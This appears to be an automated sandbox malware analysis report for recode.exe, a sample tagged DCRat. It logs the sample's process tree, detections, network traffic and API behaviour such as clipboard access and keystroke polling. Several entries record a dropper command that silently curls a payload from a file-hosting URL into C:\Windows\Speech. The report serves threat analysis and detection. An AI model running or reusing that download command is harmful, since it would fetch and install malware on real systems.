Edit tour

Windows Analysis Report
recode.exe

Overview

General Information

Sample name:	recode.exe
Analysis ID:	1590000
MD5:	0023578e24d6ed38daf9c364137a8929
SHA1:	8f99599b5ee81e2b2401a3ef7eb17026780a1bd9
SHA256:	ff717b5311c7d23838e0f7c9f06d8967b43626dfcababc329386851e6e6d9cb3
Tags:	DCRatexeNyashTeamuser-MalHunter3
Infos:

Detection

HTMLPhisher

Score:	76
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Antivirus / Scanner detection for submitted sample

Multi AV Scanner detection for submitted file

Yara detected BlockedWebSite

AI detected suspicious sample

Creates HTML files with .exe extension (expired dropper behavior)

Machine Learning detection for sample

AV process strings found (often used to terminate AV products)

Contains functionality for read data from the clipboard

Contains functionality to check if a debugger is running (IsDebuggerPresent)

Contains functionality to check if a debugger is running (OutputDebugString,GetLastError)

Contains functionality to communicate with device drivers

Contains functionality to dynamically determine API calls

Contains functionality to modify clipboard data

Contains functionality to query locales information (e.g. system language)

Contains functionality to read the clipboard data

Contains functionality to retrieve information about pressed keystrokes

Contains functionality to simulate mouse events

Creates a process in suspended mode (likely to inject code)

Creates files inside the system directory

Detected potential crypto function

Found large amount of non-executed APIs

IP address seen in connection with other malware

JA3 SSL client fingerprint seen in connection with other malware

PE file contains sections with non-standard names

Potential key logger detected (key state polling based)

Sigma detected: Usage Of Web Request Commands And Cmdlets

Uses code obfuscation techniques (call, push, ret)

Classification

Process Tree

System is w10x64

recode.exe (PID: 1036 cmdline: "C:\Users\user\Desktop\recode.exe" MD5: 0023578E24D6ED38DAF9C364137A8929)

conhost.exe (PID: 1524 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

cmd.exe (PID: 6292 cmdline: C:\Windows\system32\cmd.exe /c curl --silent https://file.garden/ZloBYxFY2AfQRNoi/dx3d9.bin --output C:\Windows\Speech\physmeme.exe MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)

curl.exe (PID: 6776 cmdline: curl --silent https://file.garden/ZloBYxFY2AfQRNoi/dx3d9.bin --output C:\Windows\Speech\physmeme.exe MD5: EAC53DDAFB5CC9E780A7CC086CE7B2B1)

cmd.exe (PID: 5436 cmdline: C:\Windows\system32\cmd.exe /c cls MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)

cleanup

Yara Signatures

Dropped Files

Source	Rule	Description	Author	Strings
C:\Windows\Speech\physmeme.exe	JoeSecurity_BlockedWebSite	Yara detected BlockedWebSite	Joe Security

Sigma Signatures

Sigma detected: Usage Of Web Request Commands And Cmdlets

Source: Process started

Author: James Pemberton / @4A616D6573, Endgame, JHasenbusch, oscd.community, Austin Songer @austinsonger: Data: Command: C:\Windows\system32\cmd.exe /c curl --silent https://file.garden/ZloBYxFY2AfQRNoi/dx3d9.bin --output C:\Windows\Speech\physmeme.exe, CommandLine: C:\Windows\system32\cmd.exe /c curl --silent https://file.garden/ZloBYxFY2AfQRNoi/dx3d9.bin --output C:\Windows\Speech\physmeme.exe, CommandLine|base64offset|contains: , Image: C:\Windows\System32\cmd.exe, NewProcessName: C:\Windows\System32\cmd.exe, OriginalFileName: C:\Windows\System32\cmd.exe, ParentCommandLine: "C:\Users\user\Desktop\recode.exe", ParentImage: C:\Users\user\Desktop\recode.exe, ParentProcessId: 1036, ParentProcessName: recode.exe, ProcessCommandLine: C:\Windows\system32\cmd.exe /c curl --silent https://file.garden/ZloBYxFY2AfQRNoi/dx3d9.bin --output C:\Windows\Speech\physmeme.exe, ProcessId: 6292, ProcessName: cmd.exe

Suricata Signatures

⊘No Suricata rule has matched

Joe Sandbox Signatures

Click to jump to signature section

Show All Signature Results

AV Detection

Antivirus / Scanner detection for submitted sample

Source: recode.exe

Avira: detected

Multi AV Scanner detection for submitted file

Source: recode.exe	ReversingLabs: Detection: 57%
Source: recode.exe	Virustotal: Detection: 63%			Perma Link

AI detected suspicious sample

Source: Submited Sample

Integrated Neural Analysis Model: Matched 99.8% probability

Machine Learning detection for sample

Source: recode.exe

Joe Sandbox ML: detected

Phishing

Yara detected BlockedWebSite

Source: Yara match

File source: C:\Windows\Speech\physmeme.exe, type: DROPPED

Source: unknown

HTTPS traffic detected: 104.21.16.1:443 -> 192.168.2.8:49708 version: TLS 1.2

Source: recode.exe

Static PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE

Source:	Binary string: C:\Users\obey\Desktop\Source2\Build\recode.pdb source: recode.exe
Source:	Binary string: C:\Users\obey\Desktop\Source2\Build\recode.pdb99 source: recode.exe

Source: C:\Users\user\Desktop\recode.exe

Code function: 0_2_00007FF75805FC84 GetFileAttributesExW,GetLastError,FindFirstFileW,GetLastError,FindClose,__std_fs_open_handle,CloseHandle,GetFileInformationByHandleEx,GetLastError,CloseHandle,abort,GetFileInformationByHandleEx,GetLastError,CloseHandle,abort,GetFileInformationByHandleEx,GetLastError,CloseHandle,abort,CloseHandle,CloseHandle,abort,

0_2_00007FF75805FC84

Networking

Creates HTML files with .exe extension (expired dropper behavior)

Source: C:\Windows\System32\curl.exe

File created: physmeme.exe.4.dr

Source: Joe Sandbox View	IP Address: 104.21.16.1 104.21.16.1
Source: Joe Sandbox View	IP Address: 104.21.16.1 104.21.16.1

Source: Joe Sandbox View

JA3 fingerprint: 74954a0c86284d0d6e1c4efefe92b521

Source: unknown

UDP traffic detected without corresponding DNS query: 1.1.1.1

Source: global traffic

HTTP traffic detected: GET /ZloBYxFY2AfQRNoi/dx3d9.bin HTTP/1.1Host: file.gardenUser-Agent: curl/7.83.1Accept: */*

Source: global traffic

DNS traffic detected: DNS query: file.garden

Source: global traffic

HTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Mon, 13 Jan 2025 12:16:09 GMTContent-Type: text/html; charset=UTF-8Transfer-Encoding: chunkedConnection: closeX-Frame-Options: SAMEORIGINReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=mrC2995L8eqQMizxCZ4zq68s0auO69Ec7YcfklffCOLthFeEj0z%2FRAaZ%2FX8l2pVXO8aeGLZ5KS9wSyDpTWAF7oC0NlNDWSJSB9bWVOLoUIhR4MNFmqWEko4fKwtvDA%3D%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 901550d92b5a41ba-EWR

Source: recode.exe	String found in binary or memory: http://fontello.com
Source: recode.exe	String found in binary or memory: http://fontello.comCopyright
Source: Amcache.hve.0.dr	String found in binary or memory: http://upx.sf.net
Source: recode.exe	String found in binary or memory: http://www.josbuivenga.demon.nl
Source: recode.exe	String found in binary or memory: http://www.josbuivenga.demon.nlCopyright
Source: recode.exe	String found in binary or memory: http://www.josbuivenga.demon.nlMuseo
Source: curl.exe, 00000004.00000002.1422090928.000001CBB3440000.00000004.00000020.00020000.00000000.sdmp, curl.exe, 00000004.00000002.1422212842.000001CBB347A000.00000004.00000020.00020000.00000000.sdmp, curl.exe, 00000004.00000003.1418861005.000001CBB3453000.00000004.00000020.00020000.00000000.sdmp, curl.exe, 00000004.00000002.1422090928.000001CBB3448000.00000004.00000020.00020000.00000000.sdmp, curl.exe, 00000004.00000003.1418751823.000001CBB3479000.00000004.00000020.00020000.00000000.sdmp, curl.exe, 00000004.00000003.1418821905.000001CBB347A000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://file.garden/ZloBYxFY2AfQRNoi/dx3d9.bin
Source: curl.exe, 00000004.00000002.1422090928.000001CBB3440000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://file.garden/ZloBYxFY2AfQRNoi/dx3d9.bin--outputC:
Source: curl.exe, 00000004.00000002.1422212842.000001CBB347A000.00000004.00000020.00020000.00000000.sdmp, curl.exe, 00000004.00000003.1418751823.000001CBB3479000.00000004.00000020.00020000.00000000.sdmp, curl.exe, 00000004.00000003.1418821905.000001CBB347A000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://file.garden/ZloBYxFY2AfQRNoi/dx3d9.binC
Source: curl.exe, 00000004.00000003.1418950817.000001CBB3456000.00000004.00000020.00020000.00000000.sdmp, curl.exe, 00000004.00000003.1418861005.000001CBB3453000.00000004.00000020.00020000.00000000.sdmp, curl.exe, 00000004.00000002.1422090928.000001CBB3448000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://file.garden/ZloBYxFY2AfQRNoi/dx3d9.binN
Source: curl.exe, 00000004.00000002.1422090928.000001CBB3448000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://file.garden/ZloBYxFY2AfQRNoi/dx3d9.binn
Source: recode.exe	String found in binary or memory: https://fontawesome.com
Source: recode.exe	String found in binary or memory: https://fontawesome.comhttps://fontawesome.comFont
Source: curl.exe, 00000004.00000003.1417827747.000001CBB34A5000.00000004.00000020.00020000.00000000.sdmp, curl.exe, 00000004.00000003.1417929801.000001CBB34BF000.00000004.00000020.00020000.00000000.sdmp, curl.exe, 00000004.00000003.1417929801.000001CBB34A5000.00000004.00000020.00020000.00000000.sdmp, curl.exe, 00000004.00000003.1417827747.000001CBB34BF000.00000004.00000020.00020000.00000000.sdmp, curl.exe, 00000004.00000003.1417996395.000001CBB34BF000.00000004.00000020.00020000.00000000.sdmp, curl.exe, 00000004.00000003.1418053562.000001CBB3461000.00000004.00000020.00020000.00000000.sdmp, physmeme.exe.4.dr	String found in binary or memory: https://www.cloudflare.com/5xx-error-landing
Source: curl.exe, 00000004.00000003.1417929801.000001CBB34BF000.00000004.00000020.00020000.00000000.sdmp, curl.exe, 00000004.00000003.1417827747.000001CBB34BF000.00000004.00000020.00020000.00000000.sdmp, curl.exe, 00000004.00000003.1417996395.000001CBB34BF000.00000004.00000020.00020000.00000000.sdmp, curl.exe, 00000004.00000003.1418053562.000001CBB3461000.00000004.00000020.00020000.00000000.sdmp, physmeme.exe.4.dr	String found in binary or memory: https://www.cloudflare.com/learning/access-management/phishing-attack/

Source: unknown	Network traffic detected: HTTP traffic on port 49708 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49708

Source: unknown

HTTPS traffic detected: 104.21.16.1:443 -> 192.168.2.8:49708 version: TLS 1.2

Source: C:\Users\user\Desktop\recode.exe

Code function: 0_2_00007FF75800D270 OpenClipboard,GetClipboardData,CloseClipboard,GlobalLock,WideCharToMultiByte,WideCharToMultiByte,GlobalUnlock,CloseClipboard,

0_2_00007FF75800D270

Source: C:\Users\user\Desktop\recode.exe

Code function: 0_2_00007FF758019C70 OpenClipboard,MultiByteToWideChar,GlobalAlloc,GlobalLock,MultiByteToWideChar,GlobalUnlock,EmptyClipboard,SetClipboardData,GlobalFree,CloseClipboard,

0_2_00007FF758019C70

Source: C:\Users\user\Desktop\recode.exe

Code function: 0_2_00007FF75800D270 OpenClipboard,GetClipboardData,CloseClipboard,GlobalLock,WideCharToMultiByte,WideCharToMultiByte,GlobalUnlock,CloseClipboard,

0_2_00007FF75800D270

Source: C:\Users\user\Desktop\recode.exe

Code function: 0_2_00007FF758046B70 GetAsyncKeyState,

0_2_00007FF758046B70

Source: C:\Users\user\Desktop\recode.exe

Code function: 0_2_00007FF758031D00 GetClientRect,QueryPerformanceCounter,GetForegroundWindow,ClientToScreen,SetCursorPos,GetCursorPos,ScreenToClient,GetKeyState,GetKeyState,GetKeyState,GetKeyState,

0_2_00007FF758031D00

Source: C:\Users\user\Desktop\recode.exe

Code function: 0_2_00007FF758053150: DeviceIoControl,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,Concurrency::cancel_current_task,FindWindowA,MessageBoxA,GetSystemMetrics,GetSystemMetrics,SetWindowPos,SetWindowPos,SetLayeredWindowAttributes,GetWindowLongA,SetWindowLongA,SetWindowLongA,DwmExtendFrameIntoClientArea,ShowWindow,UpdateWindow,ShowWindow,

0_2_00007FF758053150

Source: C:\Windows\System32\curl.exe

File created: C:\Windows\Speech\physmeme.exe

Jump to behavior

Source: C:\Users\user\Desktop\recode.exe	Code function: 0_2_00007FF758002610	0_2_00007FF758002610
Source: C:\Users\user\Desktop\recode.exe	Code function: 0_2_00007FF758022920	0_2_00007FF758022920
Source: C:\Users\user\Desktop\recode.exe	Code function: 0_2_00007FF75803B920	0_2_00007FF75803B920
Source: C:\Users\user\Desktop\recode.exe	Code function: 0_2_00007FF758053150	0_2_00007FF758053150
Source: C:\Users\user\Desktop\recode.exe	Code function: 0_2_00007FF7580431B0	0_2_00007FF7580431B0
Source: C:\Users\user\Desktop\recode.exe	Code function: 0_2_00007FF7580479C0	0_2_00007FF7580479C0
Source: C:\Users\user\Desktop\recode.exe	Code function: 0_2_00007FF75802D1C0	0_2_00007FF75802D1C0
Source: C:\Users\user\Desktop\recode.exe	Code function: 0_2_00007FF75801B9F0	0_2_00007FF75801B9F0
Source: C:\Users\user\Desktop\recode.exe	Code function: 0_2_00007FF758037A20	0_2_00007FF758037A20
Source: C:\Users\user\Desktop\recode.exe	Code function: 0_2_00007FF758037240	0_2_00007FF758037240
Source: C:\Users\user\Desktop\recode.exe	Code function: 0_2_00007FF758013A60	0_2_00007FF758013A60
Source: C:\Users\user\Desktop\recode.exe	Code function: 0_2_00007FF758036A60	0_2_00007FF758036A60
Source: C:\Users\user\Desktop\recode.exe	Code function: 0_2_00007FF758041280	0_2_00007FF758041280
Source: C:\Users\user\Desktop\recode.exe	Code function: 0_2_00007FF7580382B0	0_2_00007FF7580382B0
Source: C:\Users\user\Desktop\recode.exe	Code function: 0_2_00007FF7580182E0	0_2_00007FF7580182E0
Source: C:\Users\user\Desktop\recode.exe	Code function: 0_2_00007FF75800EB30	0_2_00007FF75800EB30
Source: C:\Users\user\Desktop\recode.exe	Code function: 0_2_00007FF758012B50	0_2_00007FF758012B50
Source: C:\Users\user\Desktop\recode.exe	Code function: 0_2_00007FF758039350	0_2_00007FF758039350
Source: C:\Users\user\Desktop\recode.exe	Code function: 0_2_00007FF758038B50	0_2_00007FF758038B50
Source: C:\Users\user\Desktop\recode.exe	Code function: 0_2_00007FF758035B60	0_2_00007FF758035B60
Source: C:\Users\user\Desktop\recode.exe	Code function: 0_2_00007FF758036380	0_2_00007FF758036380
Source: C:\Users\user\Desktop\recode.exe	Code function: 0_2_00007FF758039BC0	0_2_00007FF758039BC0
Source: C:\Users\user\Desktop\recode.exe	Code function: 0_2_00007FF75802BBE0	0_2_00007FF75802BBE0
Source: C:\Users\user\Desktop\recode.exe	Code function: 0_2_00007FF758047400	0_2_00007FF758047400
Source: C:\Users\user\Desktop\recode.exe	Code function: 0_2_00007FF75803A430	0_2_00007FF75803A430
Source: C:\Users\user\Desktop\recode.exe	Code function: 0_2_00007FF75805CC30	0_2_00007FF75805CC30
Source: C:\Users\user\Desktop\recode.exe	Code function: 0_2_00007FF75803A440	0_2_00007FF75803A440
Source: C:\Users\user\Desktop\recode.exe	Code function: 0_2_00007FF758035470	0_2_00007FF758035470
Source: C:\Users\user\Desktop\recode.exe	Code function: 0_2_00007FF75805FC84	0_2_00007FF75805FC84
Source: C:\Users\user\Desktop\recode.exe	Code function: 0_2_00007FF75802ACD0	0_2_00007FF75802ACD0
Source: C:\Users\user\Desktop\recode.exe	Code function: 0_2_00007FF75802C4F0	0_2_00007FF75802C4F0
Source: C:\Users\user\Desktop\recode.exe	Code function: 0_2_00007FF7580254E0	0_2_00007FF7580254E0
Source: C:\Users\user\Desktop\recode.exe	Code function: 0_2_00007FF758031D00	0_2_00007FF758031D00
Source: C:\Users\user\Desktop\recode.exe	Code function: 0_2_00007FF75802D530	0_2_00007FF75802D530
Source: C:\Users\user\Desktop\recode.exe	Code function: 0_2_00007FF75802CD50	0_2_00007FF75802CD50
Source: C:\Users\user\Desktop\recode.exe	Code function: 0_2_00007FF75802FD40	0_2_00007FF75802FD40
Source: C:\Users\user\Desktop\recode.exe	Code function: 0_2_00007FF758042570	0_2_00007FF758042570
Source: C:\Users\user\Desktop\recode.exe	Code function: 0_2_00007FF75800ED60	0_2_00007FF75800ED60
Source: C:\Users\user\Desktop\recode.exe	Code function: 0_2_00007FF75803AD80	0_2_00007FF75803AD80
Source: C:\Users\user\Desktop\recode.exe	Code function: 0_2_00007FF75800D5A0	0_2_00007FF75800D5A0
Source: C:\Users\user\Desktop\recode.exe	Code function: 0_2_00007FF75801DDD0	0_2_00007FF75801DDD0
Source: C:\Users\user\Desktop\recode.exe	Code function: 0_2_00007FF758034DC0	0_2_00007FF758034DC0
Source: C:\Users\user\Desktop\recode.exe	Code function: 0_2_00007FF758030610	0_2_00007FF758030610
Source: C:\Users\user\Desktop\recode.exe	Code function: 0_2_00007FF758041E00	0_2_00007FF758041E00
Source: C:\Users\user\Desktop\recode.exe	Code function: 0_2_00007FF758004640	0_2_00007FF758004640
Source: C:\Users\user\Desktop\recode.exe	Code function: 0_2_00007FF758013650	0_2_00007FF758013650
Source: C:\Users\user\Desktop\recode.exe	Code function: 0_2_00007FF758048650	0_2_00007FF758048650
Source: C:\Users\user\Desktop\recode.exe	Code function: 0_2_00007FF75801BE40	0_2_00007FF75801BE40
Source: C:\Users\user\Desktop\recode.exe	Code function: 0_2_00007FF75801C640	0_2_00007FF75801C640
Source: C:\Users\user\Desktop\recode.exe	Code function: 0_2_00007FF758036660	0_2_00007FF758036660
Source: C:\Users\user\Desktop\recode.exe	Code function: 0_2_00007FF758030E60	0_2_00007FF758030E60
Source: C:\Users\user\Desktop\recode.exe	Code function: 0_2_00007FF758011EB0	0_2_00007FF758011EB0
Source: C:\Users\user\Desktop\recode.exe	Code function: 0_2_00007FF75800D6D0	0_2_00007FF75800D6D0
Source: C:\Users\user\Desktop\recode.exe	Code function: 0_2_00007FF7580146C0	0_2_00007FF7580146C0
Source: C:\Users\user\Desktop\recode.exe	Code function: 0_2_00007FF758018EF0	0_2_00007FF758018EF0
Source: C:\Users\user\Desktop\recode.exe	Code function: 0_2_00007FF75802EEE0	0_2_00007FF75802EEE0
Source: C:\Users\user\Desktop\recode.exe	Code function: 0_2_00007FF758021740	0_2_00007FF758021740
Source: C:\Users\user\Desktop\recode.exe	Code function: 0_2_00007FF75805E740	0_2_00007FF75805E740
Source: C:\Users\user\Desktop\recode.exe	Code function: 0_2_00007FF758024760	0_2_00007FF758024760
Source: C:\Users\user\Desktop\recode.exe	Code function: 0_2_00007FF7580347D0	0_2_00007FF7580347D0
Source: C:\Users\user\Desktop\recode.exe	Code function: 0_2_00007FF75802E7E0	0_2_00007FF75802E7E0
Source: C:\Users\user\Desktop\recode.exe	Code function: 0_2_00007FF75803D850	0_2_00007FF75803D850
Source: C:\Users\user\Desktop\recode.exe	Code function: 0_2_00007FF758041860	0_2_00007FF758041860
Source: C:\Users\user\Desktop\recode.exe	Code function: 0_2_00007FF758032080	0_2_00007FF758032080
Source: C:\Users\user\Desktop\recode.exe	Code function: 0_2_00007FF7580360A0	0_2_00007FF7580360A0
Source: C:\Users\user\Desktop\recode.exe	Code function: 0_2_00007FF7580318D0	0_2_00007FF7580318D0
Source: C:\Users\user\Desktop\recode.exe	Code function: 0_2_00007FF7580060D0	0_2_00007FF7580060D0
Source: C:\Users\user\Desktop\recode.exe	Code function: 0_2_00007FF758026910	0_2_00007FF758026910
Source: C:\Users\user\Desktop\recode.exe	Code function: 0_2_00007FF758035100	0_2_00007FF758035100

Source: classification engine

Classification label: mal76.phis.winEXE@9/2@1/2

Source: C:\Windows\System32\conhost.exe

Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1524:120:WilError_03

Source: recode.exe

Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ

Source: C:\Users\user\Desktop\recode.exe

File read: C:\Users\user\Desktop\desktop.ini

Jump to behavior

Source: C:\Users\user\Desktop\recode.exe

Key opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: recode.exe	ReversingLabs: Detection: 57%
Source: recode.exe	Virustotal: Detection: 63%

Source: recode.exe	String found in binary or memory: hourglass-start
Source: recode.exe	String found in binary or memory: hands-helping

Source: unknown	Process created: C:\Users\user\Desktop\recode.exe "C:\Users\user\Desktop\recode.exe"
Source: C:\Users\user\Desktop\recode.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\recode.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c curl --silent https://file.garden/ZloBYxFY2AfQRNoi/dx3d9.bin --output C:\Windows\Speech\physmeme.exe
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\curl.exe curl --silent https://file.garden/ZloBYxFY2AfQRNoi/dx3d9.bin --output C:\Windows\Speech\physmeme.exe
Source: C:\Users\user\Desktop\recode.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c cls
Source: C:\Users\user\Desktop\recode.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c curl --silent https://file.garden/ZloBYxFY2AfQRNoi/dx3d9.bin --output C:\Windows\Speech\physmeme.exe	Jump to behavior
Source: C:\Users\user\Desktop\recode.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c cls	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\curl.exe curl --silent https://file.garden/ZloBYxFY2AfQRNoi/dx3d9.bin --output C:\Windows\Speech\physmeme.exe	Jump to behavior

Source: C:\Users\user\Desktop\recode.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\Desktop\recode.exe	Section loaded: d3d11.dll	Jump to behavior
Source: C:\Users\user\Desktop\recode.exe	Section loaded: dwmapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\recode.exe	Section loaded: d3dcompiler_47.dll	Jump to behavior
Source: C:\Users\user\Desktop\recode.exe	Section loaded: msvcp140.dll	Jump to behavior
Source: C:\Users\user\Desktop\recode.exe	Section loaded: vcruntime140.dll	Jump to behavior
Source: C:\Users\user\Desktop\recode.exe	Section loaded: vcruntime140_1.dll	Jump to behavior
Source: C:\Users\user\Desktop\recode.exe	Section loaded: dxgi.dll	Jump to behavior
Source: C:\Users\user\Desktop\recode.exe	Section loaded: vcruntime140.dll	Jump to behavior
Source: C:\Users\user\Desktop\recode.exe	Section loaded: vcruntime140_1.dll	Jump to behavior
Source: C:\Users\user\Desktop\recode.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Users\user\Desktop\recode.exe	Section loaded: textshaping.dll	Jump to behavior
Source: C:\Users\user\Desktop\recode.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\Desktop\recode.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\Desktop\recode.exe	Section loaded: textinputframework.dll	Jump to behavior
Source: C:\Users\user\Desktop\recode.exe	Section loaded: coreuicomponents.dll	Jump to behavior
Source: C:\Users\user\Desktop\recode.exe	Section loaded: coremessaging.dll	Jump to behavior
Source: C:\Users\user\Desktop\recode.exe	Section loaded: ntmarta.dll	Jump to behavior
Source: C:\Users\user\Desktop\recode.exe	Section loaded: coremessaging.dll	Jump to behavior
Source: C:\Users\user\Desktop\recode.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\Desktop\recode.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\Desktop\recode.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\Desktop\recode.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\Desktop\recode.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\Desktop\recode.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Users\user\Desktop\recode.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\recode.exe	Section loaded: edputil.dll	Jump to behavior
Source: C:\Users\user\Desktop\recode.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Users\user\Desktop\recode.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Users\user\Desktop\recode.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Users\user\Desktop\recode.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Users\user\Desktop\recode.exe	Section loaded: windows.staterepositoryps.dll	Jump to behavior
Source: C:\Users\user\Desktop\recode.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\user\Desktop\recode.exe	Section loaded: appresolver.dll	Jump to behavior
Source: C:\Users\user\Desktop\recode.exe	Section loaded: bcp47langs.dll	Jump to behavior
Source: C:\Users\user\Desktop\recode.exe	Section loaded: slc.dll	Jump to behavior
Source: C:\Users\user\Desktop\recode.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Users\user\Desktop\recode.exe	Section loaded: sppc.dll	Jump to behavior
Source: C:\Users\user\Desktop\recode.exe	Section loaded: onecorecommonproxystub.dll	Jump to behavior
Source: C:\Users\user\Desktop\recode.exe	Section loaded: onecoreuapcommonproxystub.dll	Jump to behavior
Source: C:\Windows\System32\curl.exe	Section loaded: secur32.dll	Jump to behavior
Source: C:\Windows\System32\curl.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\System32\curl.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Windows\System32\curl.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Windows\System32\curl.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\System32\curl.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Windows\System32\curl.exe	Section loaded: rasadhlp.dll	Jump to behavior
Source: C:\Windows\System32\curl.exe	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Windows\System32\curl.exe	Section loaded: schannel.dll	Jump to behavior
Source: C:\Windows\System32\curl.exe	Section loaded: mskeyprotect.dll	Jump to behavior
Source: C:\Windows\System32\curl.exe	Section loaded: ntasn1.dll	Jump to behavior
Source: C:\Windows\System32\curl.exe	Section loaded: ncrypt.dll	Jump to behavior
Source: C:\Windows\System32\curl.exe	Section loaded: ncryptsslp.dll	Jump to behavior

Source: C:\Users\user\Desktop\recode.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{1f486a52-3cb1-48fd-8f50-b8dc300d9f9d}\InProcServer32

Jump to behavior

Source: recode.exe

Static PE information: Image base 0x140000000 > 0x60000000

Source: recode.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IMPORT
Source: recode.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_RESOURCE
Source: recode.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_BASERELOC
Source: recode.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
Source: recode.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG
Source: recode.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IAT

Source: recode.exe

Static PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE

Source: recode.exe

Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG

Source:	Binary string: C:\Users\obey\Desktop\Source2\Build\recode.pdb source: recode.exe
Source:	Binary string: C:\Users\obey\Desktop\Source2\Build\recode.pdb99 source: recode.exe

Source: recode.exe	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IMPORT is in: .rdata
Source: recode.exe	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_RESOURCE is in: .rsrc
Source: recode.exe	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_BASERELOC is in: .reloc
Source: recode.exe	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG is in: .rdata
Source: recode.exe	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IAT is in: .rdata

Source: C:\Users\user\Desktop\recode.exe

Code function: 0_2_00007FF758031B60 QueryPerformanceFrequency,QueryPerformanceCounter,LoadLibraryA,GetProcAddress,GetProcAddress,

0_2_00007FF758031B60

Source: recode.exe

Static PE information: section name: _RDATA

Source: C:\Users\user\Desktop\recode.exe

Code function: 0_2_00007FF758017EC2 push rbp; iretd

0_2_00007FF758017EC3

Source: C:\Users\user\Desktop\recode.exe

Process information set: NOOPENFILEERRORBOX

Jump to behavior

Source: C:\Users\user\Desktop\recode.exe

API coverage: 1.1 %

Source: C:\Users\user\Desktop\recode.exe

0_2_00007FF75805FC84

Source: Amcache.hve.0.dr	Binary or memory string: VMware
Source: Amcache.hve.0.dr	Binary or memory string: VMware Virtual USB Mouse
Source: recode.exe, 00000000.00000003.1728225180.000001D921FCD000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: ?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}u
Source: Amcache.hve.0.dr	Binary or memory string: vmci.syshbin
Source: Amcache.hve.0.dr	Binary or memory string: VMware-42 27 c5 9a 47 85 d6 84-53 49 ec ec 87 a6 6d 67
Source: Amcache.hve.0.dr	Binary or memory string: VMware, Inc.
Source: Amcache.hve.0.dr	Binary or memory string: VMware20,1hbin@
Source: Amcache.hve.0.dr	Binary or memory string: c:\windows\system32\driverstore\filerepository\vmci.inf_amd64_68ed49469341f563
Source: Amcache.hve.0.dr	Binary or memory string: Ascsi/cdrom&ven_necvmwar&prod_vmware_sata_cd00/4&224f42ef&0&000000
Source: Amcache.hve.0.dr	Binary or memory string: .Z$c:/windows/system32/drivers/vmci.sys
